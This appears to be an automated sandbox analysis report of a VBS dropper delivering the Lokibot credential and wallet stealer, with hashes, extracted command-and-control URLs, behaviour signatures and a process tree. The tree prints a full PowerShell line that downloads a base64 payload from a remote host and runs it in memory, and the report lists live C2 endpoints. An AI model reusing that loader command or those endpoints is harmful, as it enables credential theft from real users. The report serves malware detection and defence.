Analysis
-
max time kernel
100s -
max time network
120s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
03-10-2022 10:22
General
-
Target
PD3007800123.vbs
-
Size
219KB
-
MD5
d873de1b3b907887305e325426c407d5
-
SHA1
99c502d13b119a1b614f7384a3ba83fab10cd85d
-
SHA256
eedb863078dbdbd83a0d52d86dd779f27115360e17676e539602f4e1a8c9437c
-
SHA512
c4577d024fbbd2ea7b143d9780c7ca9f813f914c7d820151acfcc5ba7a92ebea832537a9847b5a7d203df6f00186be6d9bc5a26e515c705badeee985def3ffa1
-
SSDEEP
48:DVK0hbQvuivLvyvTxYvsvuiv7vu2vJR2vFvvvfv1KvFvDv2UfHvrvUvgYvc2vGgR:xKWdUIlVcWHfvGvXimF
Malware Config
Extracted
http://20.7.14.99/dll/dll_ink.pdf
Extracted
lokibot
http://iklok.us/li/UN/yours_me.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
-
Blocklisted process makes network request 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 13 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PD3007800123.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.emit/swen/36.81.331.591//:ptth'))2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD59bc7f1b87a2c2bc9983a37920272f493
SHA11f4c28f4ddd202012474c28d857cae8f8f555ddf
SHA25613c488a6e5d81afee96b146445e7c2b153995b546bba9c6cbc4f5244eae843b1
SHA5129c0869d87ff9f71da92b73bbdcda5328a2633de6b8d32ed253f8fea52768bdacb6bebad49ec97006494da8cc5e9008453e5901de28e30d4b560e734d98f0f3c7
-
memory/1648-132-0x0000000000000000-mapping.dmp
-
memory/1648-133-0x000001FE6A300000-0x000001FE6A322000-memory.dmpFilesize
136KB
-
memory/1648-134-0x00007FFC1D440000-0x00007FFC1DF01000-memory.dmpFilesize
10.8MB
-
memory/1648-141-0x00007FFC1D440000-0x00007FFC1DF01000-memory.dmpFilesize
10.8MB
-
memory/3608-138-0x00000000004139DE-mapping.dmp
-
memory/3608-137-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/3608-143-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/3608-144-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/3608-145-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/4136-136-0x00007FFC1D440000-0x00007FFC1DF01000-memory.dmpFilesize
10.8MB
-
memory/4136-135-0x0000000000000000-mapping.dmp